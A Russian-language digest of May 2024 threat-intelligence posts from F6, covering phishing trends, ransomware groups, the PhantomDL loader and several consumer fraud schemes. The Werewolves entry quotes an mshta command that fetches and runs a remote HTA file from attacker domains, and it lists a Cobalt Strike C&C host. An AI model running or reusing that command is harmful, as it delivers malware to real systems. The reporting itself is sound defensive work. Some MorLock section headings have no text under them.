3 мая: Препарируем фишинговые рассылки

🔥 Препарируем фишинговые рассылки: топ вредоносных программ, статистика по дням недели, почтовые сервисы и расширения вложений. Специалисты Центра кибербезопасности F6 изучили фишинговые рассылки, которые перехватило и нейтрализовало решение F6 Managed XDR в первом квартале 2024 года. Результаты исследования — в инфографике.

⚙️ Ключевые выводы по первому кварталу 2024:

☀️ Пик вредоносных рассылок пришелся на среду, а годом ранее это был понедельник. Заметен двухкратный рост отправленных писем в выходные дни — возможно, атакующие пытаются расширить поверхность атаки, рассчитывая, что сотрудники компании проверяют почту в нерабочие дни с личных устройств.

☀️ В 70% рассылок, содержащих ссылки на загрузку ВПО, содержались трояны удаленного доступа Darktrack RAT и Ozone RAT, стилеры Glory Stealer и MetaStealer, рассылаемые группировкой Sticky Werewolf — кибершпионской группой, атакующей преимущественно госучреждения и финансовые компании.

☀️ За последние полгода злоумышленники стали еще активнее рассылать вредоносное ПО Agent Tesla. В начале 2024 г. доля Agent Tesla превысила 60% по отношению к другим семействам вредоносного ПО.

☀️ Все чаще в фишинговых атаках при отправке писем используется доменная зона .ru — такие рассылки ассоциируются с российскими ресурсами, и многие пользователи им доверяют.

⚙️ Справка по топ-3 ВПО в фишинговых рассылках:
Agent Tesla — модульное программное обеспечение для шпионажа, распространяемое по модели malware-as-a-service под видом легального кейлоггер-продукта.
FormBook — инструмент для кражи учетных и персональных данных. ВПО внедряется в различные процессы и устанавливает hook для регистрации нажатий клавиш, кражи содержимого буфера обмена и извлечения данных из сеансов HTTP.
Remcos — инструмент удаленного доступа к системе и выполнения различных действий, получения данных, мониторинга активности. Remcos обычно не используется для непосредственной эксплуатации компьютеров или кражи конфиденциальной информации.

6 мая: Мошеннические фотосессии

⭐️ Новую схему с мошенническими фотосессиями выявили специалисты F6 совместно с сотрудниками Московского уголовного розыска — МУРа. Всего эксперты F6 обнаружили 26 сайтов мошеннических фотостудий. Ресурсы направлены на блокировку.

⚙️ Как работает схема
Девушкам предлагают бесплатно провести профессиональную фотосъемку, оплатив лишь почасовую аренду студии — от 1800 до 3000 рублей. В итоге у жертвы похищают деньги и данные банковских карт, в том числе под предлогом отмены фотосессии и возврата предоплаты.

↖️ Жертвами мошенников становятся преимущественно девушки. Злоумышленники используют схему с фотосессиями с конца 2023 года. В первом квартале 2024 года она начала набирать обороты.

⚙️ Справка
Новая интернет-афера похожа на популярную у мошенников схему Fake Date, но использует незаезженный сценарий обмана.
Суть Fake Date такая: незнакомка предлагает молодому человеку забронировать столик в ресторане или приобрести билеты в театр или кино — на фишинговом ресурсе.

7 мая: Вымогатели MorLock усилили атаки

🔥 Вымогатели MorLock усилили атаки на российский бизнес. Первые атаки группировки зафиксированы в начале 2024 года. Специалисты Лаборатории компьютерной криминалистики F6 отмечают, что их активность значительно возросла в апреле и мае. Цель MorLock — российские компании среднего и крупного бизнеса. С начала 2024 года от атак группировки пострадали 9 жертв.

↖️ Как и группа Muliaka, MorLock распространяют программу-вымогатель в сети жертвы через популярный корпоративный антивирус.

⚙️ Особенности атак MorLock:

⚙️ Методы проникновения:

13 мая: Новый вредоносный загрузчик PhantomDL

C марта специалисты F6 Threat Intelligence детектируют новый вредоносный загрузчик PhantomDL (PhantomGoDownloader). Аналитики обнаружили ряд связей, которые могут свидетельствовать, что загрузчик создан кибершпионами PhantomCore. Можно предположить, что группа активно развивает свой инструментарий и переходит от стадии тестирования инструмента к наступлению.

⚙️ Справка
Группа PhantomCore работает по России с января 2024 года. Ее целью часто становятся компании военно-промышленного комплекса.

↖️ PhantomCore атакует жертву через фишинговые письма с запароленными вредоносными архивами во вложении и паролем в тексте письма. Документы-приманки часто замаскированы под официальные договоры. Основной инструмент группы — троян удаленного доступа PhantomRAT.

↖️ Злоумышленники эксплуатируют вариацию уязвимости WinRAR — CVE-2023-38831, в которой вместо ZIP-архивов используются RAR-архивы. Исполняемый файл является загрузчиком, написанным на языке Go. Для его обфускации, предположительно, используется утилита Garble.

16 мая: Почему хакеры быстрее проникают в сети

Раньше хакерам требовались недели, чтобы проникнуть в сеть компании, а сейчас активная фаза атаки длится несколько часов. Что на это повлияло? Об этом в новом материале на VC рассказал Антон Величко, руководитель Лаборатории цифровой криминалистики F6. Делимся ключевыми тезисами.

⚙️ Пять факторов, которые привели к ускорению атак:

1️⃣ Рост количества атак. Увеличение числа атак и новых участников киберпреступного мира, стремящихся к быстрой финансовой выгоде, привело к популяризации вымогательских схем.

2️⃣ Геополитическая обстановка. Политически мотивированные группы — хактивисты — обмениваются опытом и повышают свою квалификацию, что увеличивает эффективность атак.

3️⃣ Развитие вредоносных сервисов. Это приводит к распределению ролей между злоумышленниками, их специализации. Часть процессов атаки уходит на аутсорс, увеличивается теневой бизнес продажи доступов, растет и качество, и выбор инструментов, которые используют злоумышленники в своих атаках.

4️⃣ Атаки через поставщиков — Trusted Relationship. Компрометация инфраструктур IT-интеграторов и разработчиков ПО позволяет хакерам получить и использовать легитимные учетные записи для входа в корпоративные сети их клиентов, не прибегая к сложным техникам получения первоначального доступа.

5️⃣ Продажа аутентификационных данных. Брокеры доступа продают данные на теневых форумах, что упрощает хакерам проникновение в сети.

⚙️ Как изменились цели атак
В 2023 году большáя часть атак была связана с утечками данных через эксплуатацию уязвимостей публичных сервисов. Сейчас растет количество атак с использованием программ-вымогателей, которые шифруют данные для шантажа с требованием выкупа информации — в противном случае ее уничтожат.

↖️ Рекордсменом по минимальному времени развития атаки с использованием программы-вымогателя является группа HsHarada. Она атакует малый и средний бизнес, а период времени реализации целей атаки может составлять до трех часов.

20 мая: Вымогатели Werewolves атаковали российские компании

⚡️ Вымогатели Werewolves атаковали российские компании. Специалисты F6 Threat Intelligence обнаружили новую волну вредоносных рассылок от группы вымогателей Werewolves.

↖️ Целью атак стали российские промышленные предприятия, телекоммуникационные и IT-компании, финансовые и страховые организации.

⚙️ Что произошло
Злоумышленники создали фейковый сайт крупного российского производителя спецтехники, скопировав содержимое оригинального портала с помощью программы HTTrack Website Copier. Отличие — только в доменном имени (у оригинального .com, у фейкового .ru).
Письма с темами «Досудебная претензия» и «Рекламация» содержали вредоносные вложения, загружающие Cobalt Strike Beacon.

⚙️ Как происходила атака
1️⃣ Жертва открывает вложенный документ «Рекламация.doc» (SHA256: da9e7da207a17076785dbe28d6c7922e81d07e84529f80e7a38265c5316fc8d2), который загружает RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.
2️⃣ На устройство жертвы загружается HTA (HTML Application): mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.
3️⃣ HTA-файл выполняет powershell-команду, в результате которой распаковывается и запускается шелл-код Cobalt Strike Stager.
4️⃣ Stager загружает Сobalt Strike Beacon, конфигурация которого содержит watermark: 987654321 и C&C: poopy[.]aarkhipov[.]ru

⚙️ Справка
Группировка Werewolves специализируется на вымогательстве денег с помощью версии программы-вымогателя LockBit3 (Black), собранной на основе появившегося в публичном пространстве билдера. У жертв требуют $130 000—$1 000 000 за расшифровку и приватность данных.
«Оборотни» используют технику двойного давления на жертву: кроме вымогательства за расшифровку данных, злоумышленники выкладывают на сайте информацию о тех, кто отказался платить выкуп.

🤭 В апреле этого года вымогатели проводили массовые рассылки на тему весеннего призыва и также досудебных претензий.

24 мая: Мошенники продают «ответы» к ЕГЭ

Бизнес на экзаменах: в соцсетях и мессенджерах мошенники продают «ответы» к ЕГЭ ↖️ Ведущий аналитик F6 Digital Risk Protection Евгений Егоров по просьбе «Газеты.Ru» насчитал по меньшей мере 60 мошеннических аккаунтов в мессенджерах и соцсетях, которые продают якобы актуальные ответы к заданиям ЕГЭ по всем предметам.

«Все точки продаж можно поделить на две группы. Одни после оплаты обещают прислать актуальные бланки с заданиями, а вторые — пригласить в так называемый VIP-чат, куда администраторы на протяжении всего марафона экзаменов будут скидывать правильные ответы». — Евгений Егоров, ведущий аналитик департамента F6 Digital Risk Protection.

Несмотря на то, что для утечки вариантов ЕГЭ почти не осталось лазеек, спрос на «готовые» ответы не снижается. Цены за один предмет в 2024 году варьируются от 500 до 2500 рублей. При этом большинство таких продавцов в лучшем случае распространяют уже опубликованные решения ЕГЭ прошлых лет, а после оплаты часто перестают выходить на связь.

27 мая: Топ-4 киберугрозы для геймеров

Эксперты F6 выделили топ-4 киберугрозы для геймеров.

1️⃣ Фишинг
Под ударом прежде всего популярные игровые платформы вроде Steam. Злоумышленники используют фишинговую технику browser-in-the-browser, создавая веб-страницы, которые сложно отличить от оригинала. Геймеров заманивают на сайты через сообщения в тематических чатах и пабликах. Еще один способ — реклама в популярном видео с игрой (запись стрима, геймплей) ⬇️
☀️ Например, фальшивый сайт PlayStation Store появился после того, как Sony прекратила продажи в России.
☀️ В топе мошеннических схем была игра Brawl Stars. Мошенники предлагали купить со скидкой внутриигровую валюту — «кристаллы» или «гемы».

2️⃣ Стилеры
Злоумышленники используют стилеры для кражи паролей игровых аккаунтов в Steam и Roblox. В этой схеме самые популярные стилеры — RedLine и Racoon.

3️⃣ Мобильные приложения
Особенно уязвимы владельцы android-устройств. Например, троян, маскирующийся под приложение для бонусов, крадет средства через банковские приложения.

4️⃣ Схемы, ориентированные на детей
Как и взрослые, дети и подростки часто становятся жертвами мошенников. Приманки такие: прокачка любимого персонажа, распродажи игровой валюты или скинов. Но результат тот же — опустевший банковский счет, причем родительский.
Инструкция для детей напоминает квест: взять телефон мамы или папы, сфотографировать экран, отправить код, удалить СМС.

⚙️ Советы для геймеров
☀️ Перед вводом данных убедитесь, что вы находитесь на официальном сайте.
☀️ Не доверяйте подозрительным сообщениям, игнорируйте предложения, которые кажутся слишком заманчивыми, чтобы быть правдой.
☀️ Используйте двухфакторную аутентификацию, где ее можно настроить.
☀️ Безопаснее скачать мобильное приложение с официального сайта игрового сервиса или по указанной на нем ссылке.
☀️ Расскажите детям, как могут действовать мошенники.

29 мая: Фишинговая кампания с водительскими правами

Желающие получить водительские права без хлопот могут стать жертвами мошенников. Фишинговую кампанию обнаружили аналитики команды F6. Мошенники предлагали сделать удостоверения не только для управления легковым автомобилем, но и мотоциклом, грузовиком и парусным судном.

⬆️ Специалисты F6 выявили 203 мошеннических ресурса, четверть из этих страниц была зарегистрирована в начале 2024 г.

«Злоумышленники также обещали решить проблемы лиц, лишенных прав, с помощью дубликатов, документов с ошибкой, зеркальных, поддельных удостоверений. На сайте жертва сталкивалась с социальной инженерией и маркетинговыми приемами. На сайтах фейковых организаций размещены статьи “Почему сдать на права с первого раза получается только у 5%” или “Почему получение прав самостоятельно через автошколу — мучительный процесс”, а дальше пользователю объясняли, как купить права быстро и с гарантией». — Иван Лебедев, руководитель группы по защите от фишинга компании F6.

⚙️ Как устроена схема
1️⃣ Фишинговые сайты. Жертва попадает на сайт, который выглядят как солидная компания, предлагающая помощь в получении водительских прав.
2️⃣ Социальная инженерия. На сайтах размещаются статьи, убеждающие пользователей, что получить права через автошколу крайне сложно. Альтернатива — услуга «легальных» прав за короткий срок.
3️⃣ Сбор личных данных. Жертвы заполняют заявку с указанием ФИО, телефона и загружают фото и копию паспорта. Эти данные могут быть использованы для дальнейших мошеннических схем. После отправки заявления появляется информация, что с пользователем скоро свяжутся, — никаких гарантий при этом нет.

↖️ Фишинговая кампания нацелена на жителей крупных городов: Москвы, Санкт-Петербурга, Казани, Ростова-на-Дону, Ярославля, Воронежа. Как партнеры указаны государственные ведомства ГИБДД, Роспотребнадзор (с опечаткой), а также автоконцерны (например BMW) и крупные страховые компании.

🤭 Ресурсы находятся в основном в доменной зоне .site, а также .com. Cпециалисты F6 инициировали процесс их блокировки.

30 мая: Мошенники в сфере онлайн-беттинга

Мошенники в сфере онлайн-беттинга все чаще прикрываются арендованными или купленными чужими аккаунтами. Распространение этой схемы зафиксировали F6 и «Лига Ставок». С помощью системы F6 Fraud Protection предотвращено более 3000 попыток онлайн-фрода в первом квартале 2024 года, в том числе с помощью арендованных и купленных учетных записей.

⚙️ Как устроена схема
➡️ Один злоумышленник мог управлять 5—10 аккаунтами в разных букмекерских компаниях с оборотом до 300 000 рублей в месяц. Как и ранее в схемах онлайн-беттинга, мошенники использовали ботов, парсеры и авторегистрации.
➡️ Многие из «приобретенных» аккаунтов объединялись в цепочки связанных учетных записей — на это указывали поведенческие активности внутри веб-ресурсов и мобильных приложений. В I квартале 2024 года выявлено 1800 сессий (почти 1% всех сессий) с признаками вовлечения учетных записей в онлайн-фрод. Новые владельцы проверяли доступ к аккаунтам и периодически поддерживали активность, создавая видимость легитимных пользователей.

⚙️ Риски для легального беттинга и e-commerce в целом
Пользователи, которые верифицировали свои аккаунты, рискуют кражей персональных данных, включая банковские карты и номера телефонов. Кроме блокировки аккаунта, они могут стать жертвами мошенничества и участниками криминальных схем с «серыми» деньгами.

«Нечистые на руку игроки прикрываются чужими верифицированными учетными записями, чтобы задействовать весь инструментарий для фрода. Без эффективной защиты с проверкой легитимности операций в режиме реального времени индустрия легального беттинга и e-commerce в целом могут терять ежегодно миллиарды рублей из-за онлайн-фрода». — Дмитрий Ермаков, руководитель департамента F6 Fraud Protection.